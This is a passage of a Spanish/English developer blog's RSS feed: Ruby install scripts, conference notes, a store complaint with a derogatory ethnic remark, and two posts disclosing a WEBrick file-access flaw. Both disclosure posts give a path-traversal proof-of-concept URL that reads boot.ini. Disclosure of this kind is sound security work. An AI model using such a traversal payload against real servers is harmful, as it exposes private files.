<p><img src="http://www.freedomcoder.com.ar/files/Picture 2.jpg" alt="Picture 2.jpg" border="0" width="571" height="555" /></p>
]]></content:encoded>
			<wfw:commentRss>http://www.freedomcoder.com.ar/2009/04/01/im-going-loco-on-friday-/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Download &amp; install ruby-1.9.1</title>
		<link>http://www.freedomcoder.com.ar/2009/02/09/download-install-ruby-191/</link>
		<comments>http://www.freedomcoder.com.ar/2009/02/09/download-install-ruby-191/#comments</comments>
		<pubDate>Tue, 10 Feb 2009 01:32:45 +0000</pubDate>
		<dc:creator>FreedomCoder</dc:creator>
				<category><![CDATA[How-To]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[programming]]></category>
		<category><![CDATA[Spanish]]></category>
		<category><![CDATA[www]]></category>

		<guid isPermaLink="false">http://www.freedomcoder.com.ar/2009/02/09/download-install-ruby-191</guid>
		<description><![CDATA[<p>Viendo que algunos me preguntaban como bajar e instalar ruby 1.9 para probarlo. Aca les dejo un script en bash que baja, descomprime, configura e instala ruby con un prefijo <strong>-1.9.1</strong> en el directorio <strong>/opt/local</strong> (Directorio comunmente usado en osx por macports.)</p>

<code>
#!/bin/sh
curl ftp://ftp.ruby-lang.org/pub/ruby/1.9/ruby-1.9.1-p0.tar.gz > /tmp/ruby-1.9.1-p0.tar.gz
cd /tmp
tar xvf ruby-1.9.1-p0.tar.gz
cd ruby-1.9.1-p0
autoconf
./configure --program-suffix=-1.9.1 --prefix=/opt/local
make
sudo make install
</code>

<strong>UPDATE: </strong>I just added another script to install directly from the svn repository. This is for those crazy people who like to live on the edge. 
<code>

#!/bin/sh
if [ -z "$1" ]; then
  	echo "usage: $0 <install&#124;update> "
  	echo "Author: Matias Pablo Brutti"
  	echo "Bye :)"
 	exit
fi

echo "This might not compile because it is download straight from"
echo "the svn repository. If it does not work either wait and try"
echo "again later or do your work and check why is not working."
echo "Happy hacking!"

if [ "$1" == install ]; then
	echo "Downloading ruby from the svn repo"
	svn co http://svn.ruby-lang.org/repos/ruby/trunk ruby
	cd ruby
fi

if [ "$1" == update ]; then 
	echo "Cleaning last install and updating repo"
	cd ruby
	make clean
	svn update
fi

echo "Configuring &#038;& installing ..."
autoconf
./configure --program-suffix=-1.9 --prefix=/opt/local
make
sudo make install

</code>

Enjoy.

]]></description>
			<content:encoded><![CDATA[<p>Viendo que algunos me preguntaban como bajar e instalar ruby 1.9 para probarlo. Aca les dejo un script en bash que baja, descomprime, configura e instala ruby con un prefijo <strong>-1.9.1</strong> en el directorio <strong>/opt/local</strong> (Directorio comunmente usado en osx por macports.)</p>
<p><code>#!/bin/sh<br />
curl ftp://ftp.ruby-lang.org/pub/ruby/1.9/ruby-1.9.1-p0.tar.gz &gt; /tmp/ruby-1.9.1-p0.tar.gz<br />
cd /tmp<br />
tar xvf ruby-1.9.1-p0.tar.gz<br />
cd ruby-1.9.1-p0<br />
autoconf<br />
./configure --program-suffix=-1.9.1 --prefix=/opt/local<br />
make<br />
sudo make install</code></p>
<p><strong>UPDATE: </strong>I just added another script to install directly from the svn repository. This is for those crazy people who like to live on the edge.<br />
<code><br />
#!/bin/sh<br />
if [ -z "$1" ]; then<br />
  	echo "usage: $0 &lt;install|update&gt; "<br />
  	echo "Author: Matias Pablo Brutti"<br />
  	echo "Bye <img src='http://www.freedomcoder.com.ar/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> "<br />
 	exit<br />
fi</p>
<p>echo "This might not compile because it is download straight from"<br />
echo "the svn repository. If it does not work either wait and try"<br />
echo "again later or do your work and check why is not working."<br />
echo "Happy hacking!"</p>
<p>if [ "$1" == install ]; then<br />
	echo "Downloading ruby from the svn repo"<br />
	svn co http://svn.ruby-lang.org/repos/ruby/trunk ruby<br />
	cd ruby<br />
fi</p>
<p>if [ "$1" == update ]; then<br />
	echo "Cleaning last install and updating repo"<br />
	cd ruby<br />
	make clean<br />
	svn update<br />
fi</p>
<p>echo "Configuring &amp;&amp; installing ..."<br />
autoconf<br />
./configure --program-suffix=-1.9 --prefix=/opt/local<br />
make<br />
sudo make install<br />
</code></p>
<p>Enjoy.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.freedomcoder.com.ar/2009/02/09/download-install-ruby-191/feed/</wfw:commentRss>
		<slash:comments>10</slash:comments>
		</item>
		<item>
		<title>LugparanaConf 2008</title>
		<link>http://www.freedomcoder.com.ar/2008/11/11/lugparanaconf-2008/</link>
		<comments>http://www.freedomcoder.com.ar/2008/11/11/lugparanaconf-2008/#comments</comments>
		<pubDate>Tue, 11 Nov 2008 07:46:49 +0000</pubDate>
		<dc:creator>FreedomCoder</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[programming]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Spanish]]></category>

		<guid isPermaLink="false">http://www.freedomcoder.com.ar/2008/11/11/lugparanaconf-2008</guid>
		<description><![CDATA[Finalmente, me sente a escribir sobre la LugParanaConf 2008. 

El Sabado primero de Noviembre se realizo la conferencia de Software Libre en la Universidad Tecnologica Nacional - Facultad Reginal Parana. Gracias a Rodolinux termine dando 3 charlas&#160; en el correspondiente orden:

1) <a href="http://freedomcoder.com.ar/lugparanaconf2008/Intro-ruby-lpc08.pdf">Intro a Ruby </a>
2) <a href="http://freedomcoder.com.ar/lugparanaconf2008/ruby-meta-lpc08.pdf">Ruby Metaprogramming</a>
3) <a href="http://freedomcoder.com.ar/lugparanaconf2008/vulns-en-la-matrix-lpc08.pdf">Vulnerabilidades en la Matrix</a>

Dentro de las charlas a destacar encontr? la de Rodolinux
(http://www.rodolinux.com.ar) y otra de Gramos
(http://gastonramos.wordpress.com/), siendo la primera muy filos?fica y psicologica y la otra altamente tecnica. 

La conferencia fue todo un ?xito aunque realmente esperaba mas gente. Siendo critico constructivo para ir pensando en LugParanaConf 09, creo que se deber?a haber realizado mucho mas propaganda en tiempo y forma en todas las universidades y colegios t?cnicos de la zona.

Siguiendo la filosof?a de full disclosure, es importante mencionar que la primera charla, fue una peque?a introducci?n a Ruby que hice en el bondi y un rato a la madrugada ( 6 - 8 AM ) cuando llegue a Parana, Asi que pido que sepan comprender y disculparme si contiene errores. :)<br />Dicho esto, las otra dos, no. Asi que sientanse libre de hacer comentarios sobre las 3 pero no me maten con la primera.

Saludos y es importante destacar que mis charlas son distribuidas bajo la licencia Creative Commons 
Attribution + Noncommercial + ShareAlike (by-nc-sa)]]></description>
			<content:encoded><![CDATA[<p>Finalmente, me sente a escribir sobre la LugParanaConf 2008. </p>
<p>El Sabado primero de Noviembre se realizo la conferencia de Software Libre en la Universidad Tecnologica Nacional &#8211; Facultad Reginal Parana. Gracias a Rodolinux termine dando 3 charlas&nbsp; en el correspondiente orden:</p>
<p>1) <a href="http://freedomcoder.com.ar/lugparanaconf2008/Intro-ruby-lpc08.pdf">Intro a Ruby </a><br />
2) <a href="http://freedomcoder.com.ar/lugparanaconf2008/ruby-meta-lpc08.pdf">Ruby Metaprogramming</a><br />
3) <a href="http://freedomcoder.com.ar/lugparanaconf2008/vulns-en-la-matrix-lpc08.pdf">Vulnerabilidades en la Matrix</a></p>
<p>Dentro de las charlas a destacar encontr? la de Rodolinux<br />
(http://www.rodolinux.com.ar) y otra de Gramos<br />
(http://gastonramos.wordpress.com/), siendo la primera muy filos?fica y psicologica y la otra altamente tecnica. </p>
<p>La conferencia fue todo un ?xito aunque realmente esperaba mas gente. Siendo critico constructivo para ir pensando en LugParanaConf 09, creo que se deber?a haber realizado mucho mas propaganda en tiempo y forma en todas las universidades y colegios t?cnicos de la zona.</p>
<p>Siguiendo la filosof?a de full disclosure, es importante mencionar que la primera charla, fue una peque?a introducci?n a Ruby que hice en el bondi y un rato a la madrugada ( 6 &#8211; 8 AM ) cuando llegue a Parana, Asi que pido que sepan comprender y disculparme si contiene errores. <img src='http://www.freedomcoder.com.ar/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> <br />Dicho esto, las otra dos, no. Asi que sientanse libre de hacer comentarios sobre las 3 pero no me maten con la primera.</p>
<p>Saludos y es importante destacar que mis charlas son distribuidas bajo la licencia Creative Commons<br />
Attribution + Noncommercial + ShareAlike (by-nc-sa)</p>
]]></content:encoded>
			<wfw:commentRss>http://www.freedomcoder.com.ar/2008/11/11/lugparanaconf-2008/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Jornadas Regionales de Software Libre</title>
		<link>http://www.freedomcoder.com.ar/2008/08/25/jornadas-regionales-de-software-libre/</link>
		<comments>http://www.freedomcoder.com.ar/2008/08/25/jornadas-regionales-de-software-libre/#comments</comments>
		<pubDate>Mon, 25 Aug 2008 21:29:42 +0000</pubDate>
		<dc:creator>FreedomCoder</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[macosx]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[programming]]></category>
		<category><![CDATA[Spanish]]></category>

		<guid isPermaLink="false">http://www.freedomcoder.com.ar/2008/08/25/jornadas-regionales-de-software-libre</guid>
		<description><![CDATA[Las CaFeConf y JRSL son peque?os espacios de encuentro con amigos que no suelo ver durante el an~o pero que comparto dia a dia proyectos, ideas, ideales, etc.

Luego Tres (3) dias de mucho Ruby, Software Libre, amigos, cerveza, charlas, keynotes de astronautas e intercambio de ideas en los pasillos, logre --en los tiempos libres-- dar un par de charlas. 
Aca les dejo los slides de las presentaciones:

* RubyCocoa:
       http://www.freedomcoder.com.ar/files/JRSL08/ruby-cocoa.pdf
* Ruby Metraprogramming:
       http://www.freedomcoder.com.ar/files/JRSL08/ruby-meta.pdf

* Photos :
       http://www.flickr.com/photos/freedomcoder/sets/72157606962173346/]]></description>
			<content:encoded><![CDATA[<p>Las CaFeConf y JRSL son peque?os espacios de encuentro con amigos que no suelo ver durante el an~o pero que comparto dia a dia proyectos, ideas, ideales, etc.</p>
<p>Luego Tres (3) dias de mucho Ruby, Software Libre, amigos, cerveza, charlas, keynotes de astronautas e intercambio de ideas en los pasillos, logre &#8211;en los tiempos libres&#8211; dar un par de charlas.<br />
Aca les dejo los slides de las presentaciones:</p>
<p>* RubyCocoa:</p>
<p>http://www.freedomcoder.com.ar/files/JRSL08/ruby-cocoa.pdf</p>
<p>* Ruby Metraprogramming:</p>
<p>http://www.freedomcoder.com.ar/files/JRSL08/ruby-meta.pdf</p>
<p>* Photos :</p>
<p>http://www.flickr.com/photos/freedomcoder/sets/72157606962173346/</p>
]]></content:encoded>
			<wfw:commentRss>http://www.freedomcoder.com.ar/2008/08/25/jornadas-regionales-de-software-libre/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>MaximSoft vende productos usados/abiertos/refurbish ?</title>
		<link>http://www.freedomcoder.com.ar/2008/04/21/maximsoft-vende-productos-usadosabiertosrefurbish-/</link>
		<comments>http://www.freedomcoder.com.ar/2008/04/21/maximsoft-vende-productos-usadosabiertosrefurbish-/#comments</comments>
		<pubDate>Mon, 21 Apr 2008 23:33:53 +0000</pubDate>
		<dc:creator>FreedomCoder</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[macosx]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[Spanish]]></category>

		<guid isPermaLink="false">http://www.freedomcoder.com.ar/2008/04/21/maximsoft-vende-productos-usadosabiertosrefurbish-</guid>
		<description><![CDATA[Hola , hoy queria comprarme un Apple Mighty Mouse wireless, busque un poco y vi que el mas economico ( no por mucho ) era el de MaximiSoft.com.ar. Los llame y no enviaban a domicilio. ( Resulto que tenia suerte). Bueno al salir del trabajo decidi ir a comprarlo personalmente, cuando llego le digo:

Yo: Hola, Llame pare comprar el Apple Mighty Mouse Wireless
Vendedor: Si pera que voy a traer a buscar uno.
Luego de unos minutos
Vendedor: Aca esta .
Yo: eh... pero porque no esta en una caja cerrada de Apple
Vendedor: no ahora para importarlos vienen asi.
Yo: mira vos... , lo quiero prender y no tenia pilas
Yo: No tiene pilas ?
Vendedor: No no tiene pilas ya no viene mas con pilas
Yo pensando ( mmmm ... esto esta usado , tiene la mugre que se acumula de los dedos) y claramente Apple nunca enviaria algo asi, deben ser los usados o los que vienen con las Apple iMac que no los venden y me quieren vender eso como nuevo.
Vendedor: y lo queres o no ?
Yo: No gracias no compro cosas abiertas/usadas como nuevos y menos a precio de algo nuevo. Ciao

RECOMENDACION: NO les compren nada a MaximSoft, Ademas de esto un amigo, Martin, tuvo problemas con una Macbook Pro. 
Mi solucion y no es para hacer propaganda ni nada fue ir a otra casa, Alfa Uno Macstore y lo tenian 5 dolares mas caro pero claramente como corresponde con caja sellada, con las pilas de lithium y con manuales. Lo mismo creo que es Macstation pero no tienen stock y es unos 30 USD mas caros. 

NO SE DEJEN CAGAR POR LOS LADRONES QUE PIENSAN QUE PORQUE ESTAMOS EN ARGENTINA SOMOS TODOS INDIOS Y NO SABEMOS NADA. !!! ESPERO QUE APPLE USA SE ENTERE Y LES SAQUEN LA AUTHORIZATION PARA SER RESELLERS.

Slds.
Digg it : http://digg.com/apple/MaximSoft_com_ar_vende_productos_usados_abiertos_refurbish]]></description>
			<content:encoded><![CDATA[<p>Hola , hoy queria comprarme un Apple Mighty Mouse wireless, busque un poco y vi que el mas economico ( no por mucho ) era el de MaximiSoft.com.ar. Los llame y no enviaban a domicilio. ( Resulto que tenia suerte). Bueno al salir del trabajo decidi ir a comprarlo personalmente, cuando llego le digo:</p>
<p>Yo: Hola, Llame pare comprar el Apple Mighty Mouse Wireless<br />
Vendedor: Si pera que voy a traer a buscar uno.<br />
Luego de unos minutos<br />
Vendedor: Aca esta .<br />
Yo: eh&#8230; pero porque no esta en una caja cerrada de Apple<br />
Vendedor: no ahora para importarlos vienen asi.<br />
Yo: mira vos&#8230; , lo quiero prender y no tenia pilas<br />
Yo: No tiene pilas ?<br />
Vendedor: No no tiene pilas ya no viene mas con pilas<br />
Yo pensando ( mmmm &#8230; esto esta usado , tiene la mugre que se acumula de los dedos) y claramente Apple nunca enviaria algo asi, deben ser los usados o los que vienen con las Apple iMac que no los venden y me quieren vender eso como nuevo.<br />
Vendedor: y lo queres o no ?<br />
Yo: No gracias no compro cosas abiertas/usadas como nuevos y menos a precio de algo nuevo. Ciao</p>
<p>RECOMENDACION: NO les compren nada a MaximSoft, Ademas de esto un amigo, Martin, tuvo problemas con una Macbook Pro.<br />
Mi solucion y no es para hacer propaganda ni nada fue ir a otra casa, Alfa Uno Macstore y lo tenian 5 dolares mas caro pero claramente como corresponde con caja sellada, con las pilas de lithium y con manuales. Lo mismo creo que es Macstation pero no tienen stock y es unos 30 USD mas caros. </p>
<p>NO SE DEJEN CAGAR POR LOS LADRONES QUE PIENSAN QUE PORQUE ESTAMOS EN ARGENTINA SOMOS TODOS INDIOS Y NO SABEMOS NADA. !!! ESPERO QUE APPLE USA SE ENTERE Y LES SAQUEN LA AUTHORIZATION PARA SER RESELLERS.</p>
<p>Slds.<br />
Digg it : http://digg.com/apple/MaximSoft_com_ar_vende_productos_usados_abiertos_refurbish</p>
]]></content:encoded>
			<wfw:commentRss>http://www.freedomcoder.com.ar/2008/04/21/maximsoft-vende-productos-usadosabiertosrefurbish-/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Finally mod_rails !</title>
		<link>http://www.freedomcoder.com.ar/2008/04/13/finally-mod_rails-/</link>
		<comments>http://www.freedomcoder.com.ar/2008/04/13/finally-mod_rails-/#comments</comments>
		<pubDate>Sun, 13 Apr 2008 15:06:38 +0000</pubDate>
		<dc:creator>FreedomCoder</dc:creator>
				<category><![CDATA[English]]></category>
		<category><![CDATA[How-To]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[macosx]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[programming]]></category>
		<category><![CDATA[www]]></category>

		<guid isPermaLink="false">http://www.freedomcoder.com.ar/2008/04/13/finally-mod_rails-</guid>
		<description><![CDATA[Extrated from <a href="http://www.modrails.com">mod_rails</a> Homepage:
"Phusion Passenger ? a.k.a. mod_rails ? makes deployment of applications built on the revolutionary Ruby on Rails web framework a breeze. It follows the usual Ruby on Rails conventions, such as ?Don?t-Repeat-Yourself?."

The most important thing, installation:

   1.   Open a terminal, and type:
<code>
      gem install passenger
</code>
   2. Type:
<code>
      passenger-install-apache2-module
</code>
      And follow the instructions.

Well, enjoy and let the party begin with Apache and Rails. Hopefully, my provider Dreamhost will be deploying this soon to production. ]]></description>
			<content:encoded><![CDATA[<p>Extrated from <a href="http://www.modrails.com">mod_rails</a> Homepage:<br />
&#8220;Phusion Passenger ? a.k.a. mod_rails ? makes deployment of applications built on the revolutionary Ruby on Rails web framework a breeze. It follows the usual Ruby on Rails conventions, such as ?Don?t-Repeat-Yourself?.&#8221;</p>
<p>The most important thing, installation:</p>
<p>   1.   Open a terminal, and type:<br />
<code>      gem install passenger</code><br />
   2. Type:<br />
<code>      passenger-install-apache2-module</code><br />
      And follow the instructions.</p>
<p>Well, enjoy and let the party begin with Apache and Rails. Hopefully, my provider Dreamhost will be deploying this soon to production. </p>
]]></content:encoded>
			<wfw:commentRss>http://www.freedomcoder.com.ar/2008/04/13/finally-mod_rails-/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Vmware Workstation 6.5  with unity in GNU/Linux</title>
		<link>http://www.freedomcoder.com.ar/2008/04/08/vmware-workstation-65-with-unity-in-gnulinux/</link>
		<comments>http://www.freedomcoder.com.ar/2008/04/08/vmware-workstation-65-with-unity-in-gnulinux/#comments</comments>
		<pubDate>Tue, 08 Apr 2008 18:28:23 +0000</pubDate>
		<dc:creator>FreedomCoder</dc:creator>
				<category><![CDATA[English]]></category>
		<category><![CDATA[How-To]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[News]]></category>

		<guid isPermaLink="false">http://www.freedomcoder.com.ar/2008/04/08/vmware-workstation-65-with-unity-in-gnulinux</guid>
		<description><![CDATA[Finally, Vmware has included unity to Vmware workstation for Linux, for now it is only available in the upcoming 6.5 version Public beta. I decided to download it and give it a try since I use vmware a lot I and would love that integration that I have with vmware fusion and parallels in my mac. 
Honestly, when I installed vmware I was a little sceptic (brit. for skeptic) about how it will run on  Compiz Fusion. Once I installed I was amazed by how well it run, although, my skeptisism was not unfounded since the refresh of the windows still is a little arghhh :D. But the windows have all the effects and gnome recognizes them as windows, as we can appreciate in the screenshot below.    Anyway, big ups for Vmware, they are finally pushing a little of that nice look and feel that they have in the mac to the Linux world. 
Even though we are geeks we still like our desktop to look nice. :D ( mmm thats why I use osx as my desktop ? nahh I love my Compiz Fusion effects no OS has that yet.)

<a href="http://www.freedomcoder.com.ar/images/vmware-unity.png"><img src="http://www.freedomcoder.com.ar/images/vmware-unity.png" width="100%"></a>

]]></description>
			<content:encoded><![CDATA[<p>Finally, Vmware has included unity to Vmware workstation for Linux, for now it is only available in the upcoming 6.5 version Public beta. I decided to download it and give it a try since I use vmware a lot I and would love that integration that I have with vmware fusion and parallels in my mac.<br />
Honestly, when I installed vmware I was a little sceptic (brit. for skeptic) about how it will run on  Compiz Fusion. Once I installed I was amazed by how well it run, although, my skeptisism was not unfounded since the refresh of the windows still is a little arghhh <img src='http://www.freedomcoder.com.ar/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> . But the windows have all the effects and gnome recognizes them as windows, as we can appreciate in the screenshot below.    Anyway, big ups for Vmware, they are finally pushing a little of that nice look and feel that they have in the mac to the Linux world.<br />
Even though we are geeks we still like our desktop to look nice. <img src='http://www.freedomcoder.com.ar/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' />  ( mmm thats why I use osx as my desktop ? nahh I love my Compiz Fusion effects no OS has that yet.)</p>
<p><a href="http://www.freedomcoder.com.ar/images/vmware-unity.png"><img src="http://www.freedomcoder.com.ar/images/vmware-unity.png" width="100%"></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.freedomcoder.com.ar/2008/04/08/vmware-workstation-65-with-unity-in-gnulinux/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>ENSO</title>
		<link>http://www.freedomcoder.com.ar/2008/04/02/enso/</link>
		<comments>http://www.freedomcoder.com.ar/2008/04/02/enso/#comments</comments>
		<pubDate>Wed, 02 Apr 2008 15:18:38 +0000</pubDate>
		<dc:creator>FreedomCoder</dc:creator>
				<category><![CDATA[English]]></category>
		<category><![CDATA[General]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[programming]]></category>
		<category><![CDATA[www]]></category>

		<guid isPermaLink="false">http://www.freedomcoder.com.ar/2008/04/02/enso</guid>
		<description><![CDATA[while surfing the web I came across a product called ENSO from <a href="http://humanized.com/enso/">humanized.com</a> , even though the video is kind of corny the actual product seams really interesting and promising. As a macosx + quicksilver user, at first I though it was just a launcher for windows, but after watching the video as a whole I realize that enso has a much more wide, productive and interesting group of apps.  The fact that you can pretty much do every task you want and really fast, makes it a necessary tool to be efficient and productive.  Well, anyone interested in the apps, I would recommend you to watch the video and give it try. I will continue doing so in my windows machine for a couple of days and see if it is as good as it is now.  The only bad thing so far, not linux nor macosx version :(, which are my main operating systems.  

Enjoy.

Download enso apps 
- <a href="http://humanized.com/installers/EnsoLauncher.exe">Enso Launcher</a>
- <a href="http://humanized.com/installers/EnsoWords.exe">Enso Words</a>
]]></description>
			<content:encoded><![CDATA[<p>while surfing the web I came across a product called ENSO from <a href="http://humanized.com/enso/">humanized.com</a> , even though the video is kind of corny the actual product seams really interesting and promising. As a macosx + quicksilver user, at first I though it was just a launcher for windows, but after watching the video as a whole I realize that enso has a much more wide, productive and interesting group of apps.  The fact that you can pretty much do every task you want and really fast, makes it a necessary tool to be efficient and productive.  Well, anyone interested in the apps, I would recommend you to watch the video and give it try. I will continue doing so in my windows machine for a couple of days and see if it is as good as it is now.  The only bad thing so far, not linux nor macosx version <img src='http://www.freedomcoder.com.ar/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' /> , which are my main operating systems.  </p>
<p>Enjoy.</p>
<p>Download enso apps<br />
- <a href="http://humanized.com/installers/EnsoLauncher.exe">Enso Launcher</a><br />
- <a href="http://humanized.com/installers/EnsoWords.exe">Enso Words</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.freedomcoder.com.ar/2008/04/02/enso/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Ayudemos al campo, ayudemos a la Argentina !!</title>
		<link>http://www.freedomcoder.com.ar/2008/03/29/ayudemos-al-campo-ayudemos-a-la-argentina-/</link>
		<comments>http://www.freedomcoder.com.ar/2008/03/29/ayudemos-al-campo-ayudemos-a-la-argentina-/#comments</comments>
		<pubDate>Sun, 30 Mar 2008 02:49:03 +0000</pubDate>
		<dc:creator>FreedomCoder</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[Spanish]]></category>

		<guid isPermaLink="false">http://www.freedomcoder.com.ar/2008/03/29/ayudemos-al-campo-ayudemos-a-la-argentina-</guid>
		<description><![CDATA[No tiene nada que ver con la informatica , pero tiene que ver con el dia a dia de mi vida y queria pedirles a todos aquellos que quieran a apoyar a los pequenos y mediano productores de campo en la lucha contra la suba de las retenciones y el constante abuso de nuestra querida presidenta para con todos. Porque primero comiezan por el campo pero si la dejamos seguir , pronto seran nuestros impuestos , ganancias, etc ...  Esto no es solo una protesta del campo es una protesta de la argentina.  Si estas de acuerdo en lo que plantea el campo pone este banner en tu sitio, pasalo en tus emails , etc. 
<div align="center" ><img src="http://www.freedomcoder.com.ar/images/paro.jpg" width="100%"></div>
Mucha gente me ha preguntado como agregar el banner en sus sitios asi que aca les dejo un ejemplo de como ponerlo.
<code>
<div align="center" ><img src="http://www.freedomcoder.com.ar/images/paro.jpg"></div>
</code>

Saludos

UPDATE: for those english readers that check this blog, this article will give you an accurate explanation of what is going on in Argentina. 
<a href="http://online.wsj.com/article/SB120692466040375723.html">http://online.wsj.com/article/SB120692466040375723.html<a>]]></description>
			<content:encoded><![CDATA[<p>No tiene nada que ver con la informatica , pero tiene que ver con el dia a dia de mi vida y queria pedirles a todos aquellos que quieran a apoyar a los pequenos y mediano productores de campo en la lucha contra la suba de las retenciones y el constante abuso de nuestra querida presidenta para con todos. Porque primero comiezan por el campo pero si la dejamos seguir , pronto seran nuestros impuestos , ganancias, etc &#8230;  Esto no es solo una protesta del campo es una protesta de la argentina.  Si estas de acuerdo en lo que plantea el campo pone este banner en tu sitio, pasalo en tus emails , etc. </p>
<div align="center" ><img src="http://www.freedomcoder.com.ar/images/paro.jpg" width="100%"></div>
<p>Mucha gente me ha preguntado como agregar el banner en sus sitios asi que aca les dejo un ejemplo de como ponerlo.<br />
<code>&lt;div align="center" &gt;&lt;img src="http://www.freedomcoder.com.ar/images/paro.jpg"&gt;&lt;/div&gt;</code></p>
<p>Saludos</p>
<p>UPDATE: for those english readers that check this blog, this article will give you an accurate explanation of what is going on in Argentina.<br />
<a href="http://online.wsj.com/article/SB120692466040375723.html">http://online.wsj.com/article/SB120692466040375723.html<a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.freedomcoder.com.ar/2008/03/29/ayudemos-al-campo-ayudemos-a-la-argentina-/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Metasploit 3.1&#8242;s WEBrick also vulnerable to  file access vulnerability</title>
		<link>http://www.freedomcoder.com.ar/2008/03/05/metasploit-31s-webrick-also-vulnerable-to-file-access-vulnerability/</link>
		<comments>http://www.freedomcoder.com.ar/2008/03/05/metasploit-31s-webrick-also-vulnerable-to-file-access-vulnerability/#comments</comments>
		<pubDate>Wed, 05 Mar 2008 17:34:46 +0000</pubDate>
		<dc:creator>FreedomCoder</dc:creator>
				<category><![CDATA[English]]></category>
		<category><![CDATA[How-To]]></category>
		<category><![CDATA[macosx]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://www.freedomcoder.com.ar/2008/03/05/metasploit-31s-webrick-also-vulnerable-to-file-access-vulnerability</guid>
		<description><![CDATA[As expected Metasploit 3.1 is also vulnerable to the File access vulnerability found in WebRick. Even though this is not a vulnerability in metasploit iself,  due to the fact that Metasploit's Web version runs Rails on top of Webrick, this latter is vulnerable so it affects anyone running metasploit's "msfweb". To be sure, I just updated to the latest svn version of metasploit and Webrick is still vulnerable. This is not critical at all, Luckily,  it is only serving on the localhost, otherwise it will suck real bad. Just to be careful and make sure that your msfweb is not accesable from the network and keep your update up to date , I guess there will be a fix soon. 
 
Proof of concept:
http://localhost:55555/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini

Post with original Webrick's bug: http://www.freedomcoder.com.ar/node/113
Credit to Digital Security Research Group (http://dsec.ru/) for disclosing Webricks's original problem to Ruby Security Team.



]]></description>
			<content:encoded><![CDATA[<p>As expected Metasploit 3.1 is also vulnerable to the File access vulnerability found in WebRick. Even though this is not a vulnerability in metasploit iself,  due to the fact that Metasploit&#8217;s Web version runs Rails on top of Webrick, this latter is vulnerable so it affects anyone running metasploit&#8217;s &#8220;msfweb&#8221;. To be sure, I just updated to the latest svn version of metasploit and Webrick is still vulnerable. This is not critical at all, Luckily,  it is only serving on the localhost, otherwise it will suck real bad. Just to be careful and make sure that your msfweb is not accesable from the network and keep your update up to date , I guess there will be a fix soon. </p>
<p>Proof of concept:</p>
<p>http://localhost:55555/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini</p>
<p>Post with original Webrick&#8217;s bug: http://www.freedomcoder.com.ar/node/113<br />
Credit to Digital Security Research Group (http://dsec.ru/) for disclosing Webricks&#8217;s original problem to Ruby Security Team.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.freedomcoder.com.ar/2008/03/05/metasploit-31s-webrick-also-vulnerable-to-file-access-vulnerability/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>WEBrick&#8217;s file access vulnerability</title>
		<link>http://www.freedomcoder.com.ar/2008/03/03/webricks-file-access-vulnerability/</link>
		<comments>http://www.freedomcoder.com.ar/2008/03/03/webricks-file-access-vulnerability/#comments</comments>
		<pubDate>Mon, 03 Mar 2008 15:34:29 +0000</pubDate>
		<dc:creator>FreedomCoder</dc:creator>
				<category><![CDATA[English]]></category>
		<category><![CDATA[How-To]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[programming]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://www.freedomcoder.com.ar/2008/03/03/webricks-file-access-vulnerability</guid>
		<description><![CDATA[WEBrick, a standard library of Ruby to implement HTTP servers, has file access vulnerability.
Impact

The following programs are vulnerable.

   1. Programs that publish files using WEBrick::HTTPServer.new with the :DocumentRoot option
   2. Programs that publish files using WEBrick::HTTPServlet::FileHandler

Affected systems are:

   1. Systems that accept backslash (\) as a path separator, such as Windows.
   2. Systems that use case insensitive filesystems such as NTFS on Windows, HFS on Mac OS X.

This vulnerability has the following impacts.

   1.

      Attacker can access private files by sending a url with url encoded backslash (\). This exploit works only on systems that accept backslash as a path separator.

      Example:

      http://[server]:[port]/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini

   2. Attacker can access files that matches to the patterns specified by the :NondisclosureName option (the default value is [".ht*", "*~"]). This exploit works only on systems that use case insensitive filesystems.

Vulnerable versions

1.8 series

        * 1.8.4 and all prior versions
        * 1.8.5-p114 and all prior versions
